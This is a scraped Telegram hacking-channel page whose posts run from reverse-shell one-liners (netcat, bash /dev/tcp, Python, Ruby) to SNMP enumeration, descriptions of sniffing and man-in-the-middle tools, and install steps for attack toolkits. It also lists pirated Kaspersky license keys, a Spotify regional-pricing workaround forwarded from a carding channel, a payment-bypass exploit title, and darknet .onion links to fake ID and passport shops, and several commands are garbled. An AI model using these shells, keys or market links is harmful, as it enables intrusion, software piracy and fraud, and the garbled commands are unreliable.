UNDERCODE COMMUNITY
2.66K subscribers
1.23K photos
31 videos
2.65K files
79.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Netcat Linux Reverse Shell :

1️⃣nc 10.10.10.10 888 -e /bin/sh
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

2️⃣ Netcat Linux Reverse Shell
nc 10.10.10.10 888 -e cmd.exe
10.10.10.10 is the IP address of the machine you want the victim to connect to.
888 is the port number (change this to whatever port you would like to use, just make sure that no firewall is blocking it).

3️⃣ Using Bash
bash -i & /dev/tcp/10.10.10.10/888 0 &1

4️⃣ Using Python
python -c 'import socket, subprocess, os; s=socket. socket (socket.AF_INET, socket.SOCK_STREAM); s.connect(("10.10.10.10",888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(l,1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'

5️⃣ Using Ruby
ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",888).to_i; exec sprintf("/bin/sh -i &%d &%d 2 &%d",f,f,f)'

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

#Useful SNMP Commands

1️⃣Search for Windows installed software
smpwalk !grep hrSWinstalledName

2️⃣ Search for Windows users
snmpwalk ip 1.3 lgrep --.1.2.25 -f4

3️⃣ Search for Windows running services
snrnpwalk -c public -v1 ip 1 lgrep hrSWRJnName !cut -d" " -f4

4️⃣ Search for Windows open TCP ports
smpwalk lgrep tcpConnState !cut -d" " -f6 !sort -u


> git sources
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 updated web server scanner :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :


1️⃣git clone https://github.com/sullo/nikto
# Main script is in program/

2️⃣cd nikto/program
# Run using the shebang interpreter

3️⃣./nikto.pl -h http://www.example.com
# Run using perl (if you forget to chmod)

4️⃣perl nikto.pl -h http://www.example.com

πŸ¦‘Run as a Docker container:

1️⃣git clone https://github.com/sullo/nikto.git

2️⃣cd nikto

3️⃣docker build -t sullo/nikto .
# Call it without arguments to display the full help

4️⃣docker run --rm sullo/nikto
# Basic usage

5️⃣docker run --rm sullo/nikto -h http://www.example.com
# To save the report in a specific format, mount /tmp as a volume:

6️⃣docker run --rm -v $(pwd):/tmp sullo/nikto -h http://www.example.com -o /tmp/out.json

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

important hackers terms :

1️⃣arpspoof
redirect packets from a target host (or all hosts) on the LAN
intended for another local host by forging ARP replies. this
is an extremely effective way of sniffing traffic on a switch.
kernel IP forwarding (or a userland program which accomplishes
the same, e.g. fragroute πŸ˜„must be turned on ahead of time.

2️⃣dnsspoof
forge replies to arbitrary DNS address / pointer queries on
the LAN. this is useful in bypassing hostname-based access
controls, or in implementing a variety of man-in-the-middle
attacks (HTTP, HTTPS, SSH, Kerberos, etc).

3️⃣dsniff
password sniffer. handles FTP, Telnet, SMTP, HTTP, POP,
poppass, NNTP, IMAP, SNMP, LDAP, Rlogin, RIP, OSPF, PPTP
MS-CHAP, NFS, VRRP, YP/NIS, SOCKS, X11, CVS, IRC, AIM, ICQ,
Napster, PostgreSQL, Meeting Maker, Citrix ICA, Symantec
pcAnywhere, NAI Sniffer, Microsoft SMB, Oracle SQL,Net, Sybase
and Microsoft SQL auth info.

4️⃣ dsniff automatically detects and minimally parses each
application protocol, only saving the interesting bits, and
uses Berkeley DB as its output file format, only logging
unique authentication attempts. full TCP/IP reassembly is
provided by libnids(3) (likewise for the following tools as
well).

5️⃣filesnarf
saves selected files sniffed from NFS traffic in the current
working directory.

6️⃣macof
flood the local network with random MAC addresses (causing
some switches to fail open in repeating mode, facilitating
sniffing). a straight C port of the original Perl Net::RawIP
macof program.

7️⃣mailsnarf
a fast and easy way to violate the Electronic Communications
Privacy Act of 1986 (18 USC 2701-2711), be careful. outputs
selected messages sniffed from SMTP and POP traffic in Berkeley
mbox format, suitable for offline browsing with your favorite
mail reader (mail -f, pine, etc.).

8️⃣msgsnarf
record selected messages from sniffed AOL Instant Messenger,
ICQ 2000, IRC, and Yahoo! Messenger chat sessions.

9️⃣sshmitm
SSH monkey-in-the-middle. proxies and sniffs SSH traffic
redirected by dnsspoof(8), capturing SSH password logins, and
optionally hijacking interactive sessions. only SSH protocol
version 1 is (or ever will be) supported - this program is far
too evil already.

πŸ”Ÿsshow
SSH traffic analysis tool. analyzes encrypted SSH-1 and SSH-2
traffic, identifying authentication attempts, the lengths of
passwords entered in interactive sessions, and command line
lengths.

1️⃣1️⃣tcpkill
kills specified in-progress TCP connections (useful for
libnids-based applications which require a full TCP 3-whs for
TCB creation).

1️⃣2️⃣tcpnice
slow down specified TCP connections via "active" traffic
shaping. forges tiny TCP window advertisements, and optionally

ICMP source quench replies.

1️⃣3️⃣urlsnarf
output selected URLs sniffed from HTTP traffic in CLF
(Common Log Format, used by almost all web servers), suitable
for offline post-processing with your favorite web log
analysis tool (analog, wwwstat, etc.).

1️⃣4️⃣webmitm
HTTP / HTTPS monkey-in-the-middle. transparently proxies and
sniffs web traffic redirected by dnsspoof(8), capturing most
"secure" SSL-encrypted webmail logins and form submissions.

1️⃣5️⃣webspy
sends URLs sniffed from a client to your local Netscape
browser for display, updated in real-time (as the target
surfs, your browser surfs along with them, automagically).
a fun party trick.

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Social-Engineer Toolkit 2020 updated :

πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

1️⃣git clone https://github.com/trustedsec/social-engineer-

2️⃣toolkit/ setoolkit/

3️⃣cd setoolkit

4️⃣pip3 install -r requirements.txt

5️⃣python setup.py

πŸ¦‘OS :

> Linux
>Mac OS X (experimental)

6️⃣Full usage see this pdf-if you beginer :
> https://github.com/trustedsec/social-engineer-toolkit/raw/master/readme/User_Manual.pdf


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A Java based HTTP/HTTPS proxy

> for assessing web application vulnerability.

>It supports editing/viewing HTTP messages on-the-fly. Other featuers include spiders, client certificate, proxy-chaining, intelligent scanning for XSS and SQL injections etc.

 for Windows-Linux-Mac :

> https://sourceforge.net/projects/paros/files/latest/download

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘What this ☠️ project can do in hacking ?

> Download :

https://wiki.owasp.org/index.php/Category:OWASP_WebScarab_Project

FEATURES :

>Fragments
- extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins

>Proxy - observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.

> Manual intercept - allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.

>Beanshell - allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.

>Reveal hidden fields - sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.
Bandwidth simulator - allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.

>Spider - identifies new URLs on the target site, and fetches them on command.

>Manual request - Allows editing and replay of previous requests, or creation of entirely new requests.
SessionID analysis - collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.

>Scripted - operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.

>Parameter fuzzer - performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.

>Search - allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.
Compare - calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is "the number of edits required to transform one document into another". For performance reasons, edits are calculated using word tokens, rather than byte by byte.

>SOAP - There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server. NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is

>Extensions - automates checks for files that were mistakenly left in web server's root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.

>XSS/CRLF - passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE SECURITY
Magento_WooCommerce_CardGate_Payment_Gateway_2_0_30_Payment_Process.php
6.5 KB
Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Vulnerable Servers :

> There are a series of vulnerable web applications that you can use to practice your skills in a safe environment. You can get more information about them in the [vulnerable_servers directory in this repository](https://github.com/The-Art-of-Hacking/art-of-hacking/tree/master/vulnerable_servers).

#How to Integrate OWASP ZAP with Jenkins :

-You can integrate ZAP with Jenkins and even automatically create Jira issues based on your findings. You can download the [ZAP plug in here](https://wiki.jenkins.io/display/JENKINS/zap+plugin).

-[This video](https://www.youtube.com/watch?v=mmHZLSffCUg) provides an overview of how to integrate


#Docker Security

- [OWASP Docker security resources](https://github.com/OWASP/Docker-Security)

- [Docker Bench for Security](https://github.com/docker/docker-bench-security)

- [Dockerscan](https://github.com/cr0hn/dockerscan)

- [Docker Security Playground](https://github.com/giper45/DockerSecurityPlayground)

#Javascript Tools :

* [Retire.js](https://retirejs.github.io/retire.js)

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Kaspery 2020 new serials :

73ENT-NF8V4-9RPKP-EHWHB Internet Security


VPWAM-6JRYT-HXWCB-ED5JC Internet Security


32RVA-GG3T6-MESQX-1FM9X Internet Security


ZQN5F-F23T4-GWBHC-BNQXW Total Security



U3V84-2RJ5E-FFMBQ-K8M7G Total Security
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘How to get a Premium Account-Crack spootify :

> Several years ago, it was possible to pay for a subscription in the United States or another region using some domestic payment services or bank cards. Then they closed the loophole and to activate the premium they began to demand the binding of a local bank card.

1️⃣Now many users practice registering family accounts for several people, one of which has the necessary physical or virtual card. So you can get a premium and save on the cost of the service.

2️⃣In order not to look for such a β€œfamily” and not depend on the whims of its other members, it is better to buy a premium yourself. Make it easier and more profitable not in the US, but in another region.

3️⃣When registering an American account, the premium will cost a significant $ 9.99 per month. The most affordable prices differ Malaysia and the Philippines . In the first case, the premium account will cost about 180 and in the second - 270 rubles.
Regional catalogs have minor differences; most music lovers will not notice them.

4️⃣Here's what you need to do to listen to music at a nice price:


1) Change the country in the existing account to Malaysia or the Philippines. To do this, go to the account settings, select the Edit Profile item and change the Country field.

> Just because the right state does not appear there. You need to "move" to the region through VPN / PROXY. It is more convenient to do this on a computer through a PROXY replacement. Here you can find the addresses you need.
Finding a free VPN with servers in these countries will be difficult.

2) Go to the Seagm service website and register. VPN and PROXY can already be disabled, at registration you should indicate the current country of residence for the convenience of payment.

3) On the service’s website, in search we search for Spotify and select maps for the desired region: Malaysia (MY) or Philippines (PH).

4) Choose a subscription period (one, three or six months) and purchase a card.

> The following payment methods are available:
There is a small commission for each payment method. There is a possibility to pay via WebMoney without commission, but the operation is manual, you will have to make a payment for the specified details and write to the support team to confirm the payment, and then send the activation code.
It’s better not to spare the extra 20 rubles for the payment to go automatically.

5) A few minutes after payment in your account, we will receive a card with a code to activate the premium subscription.

6) We go here and activate the received code.
All! Enjoy the benefits of a premium account.
What's next

> Unfortunately, there are not always cards with codes in the store. If you see a half-year on a Philippine account - immediately buy.

7) When the subscription term comes to an end, just buy another code on the Seagm website

No PROXY or VPN will be required anymore, except Spotify will not require a connection from its home country every two weeks.

> use this tutorial for learn
-not for steal !


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE SECURITY
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Insecure Protocols and Services

#Insecure Protocols
The following are also some of the protocols that are considered insecure:

- Rlogin: https://linux.die.net/man/1/rlogin
- Rsh: https://linux.die.net/man/1/rsh
- Finger: https://linux.die.net/man/1/finger


#Insecure Services
The following services should be carefully implemented and not exposed to untrusted networks:

- Authd (or Identd): https://linux.die.net/man/3/ident
- Netdump: https://linux.die.net/man/8/netdump
- Netdump-server: https://linux.die.net/man/8/netdump-server
- Nfs: https://linux.die.net/man/5/nfs
- Rwhod: https://linux.die.net/man/8/rwhod
- Sendmail: https://linux.die.net/man/8/sendmail.sendmail
- Samba: https://linux.die.net/man/7/samba
- Yppasswdd: https://linux.die.net/man/8/yppasswdd
- Ypserv: https://linux.die.net/man/8/ypserv
- Ypxfrd: https://linux.die.net/man/8/ypxfrd

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘FULL ALL VPN 2020 RESOURCES

> How it work
> configure
> hack

#IKEv2 and FlexVPN
- [Configuring IKEv2 VRF aware SVTI]()

#Cisco ASA IPsec VPN
- [ASA IKEv2 RA VPN With Windows or Android VPN Clients and Certificate Authentication Configuration](https://www.cisco.com/c/en/us/support/docs/security/adaptive-security-appliance-asa-software/213246-asa-ikev2-ra-vpn-with-windows-7-or-andro.html)


#Troubleshooting Commands
- [IPsec Troubleshooting: Understanding and Using debug Commands](https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-protocols/5409-ipsec-debug-00.html)
- [IPSec show commands Reference](https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/s1/sec-s1-cr-book/sec-cr-s3.html#wp3114534247)


## Additional GET VPN Resources

- [GETVPN Deployment Guide ](https://www.cisco.com/c/en/us/products/collateral/security/group-encrypted-transport-vpn/deployment_guide_c07_554713.html)
- [GETVPN Sample Configurations](https://www.cisco.com/c/en/us/products/collateral/security/group-encrypted-transport-vpn/deployment_guide_c07_554713.html)


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘#Useful `tcpdump` commands

1️⃣TCPDUMP Cheat Sheet
* [TCPDUMP Cheat Sheet](http://packetlife.net/media/library/12/tcpdump.pdf) is a good resource (I also have a local copy in this repository)

2️⃣TCP traffic on port 80-88
tcpdump -nvvX -sO -i ethO tcp portrange 80-88

3️⃣Capturing traffic to specific IP address excluding specific subnet
tcpdump -I ethO -tttt dst ip and not net 10.10.10.0/24

4️⃣Capturing traffic for a specific host
tcpdump host 10.1.1.1

5️⃣Capturing traffic for a specific subnet
tcpdump net 10.1.1

6️⃣Capturing traffic for a given duration in seconds
dumpcap -I ethO -a duration: sec -w file myfile.pcap

7️⃣Replaying a PCAP
file2cable -i ethO -f file.pcap

8️⃣Replaying packets (to fuzz/DoS)
`tcpreplay--topspeed --loop=O --intf=ethO pcap_file_to_replay mbps=10|100|1000


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘2020 ONLINE 7/24-24/24 MARKETS POPULAR & TRUSTED SERVICES :

http://mobil7rab6nuf7vx.onion/ – Mobile Store

http://54flq67kqr5wvjqf.onion/ – MSR Shop

http://yth5q7zdmqlycbcz.onion/ – Old Man Fixer’s Fixing Services

http://matrixtxri745dfw.onion/neo/uploads/

MATRIXtxri745dfwONION_130827231336IPA_pc.png – PC Shop

http://storegsq3o5mfxiz.onion/ – Samsung StorE

http://sheep5u64fi457aw.onion/ – Sheep Marketplace

http://nr6juudpp4as4gjg.onion/betcoin.htm – Tor BetCoin

http://qizriixqwmeq4p5b.onion/ – Tor Web Developer

http://vfqnd6mieccqyiit.onion/ – UK Passports

http://en35tuzqmn4lofbk.onion/ – US Fake ID Store

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁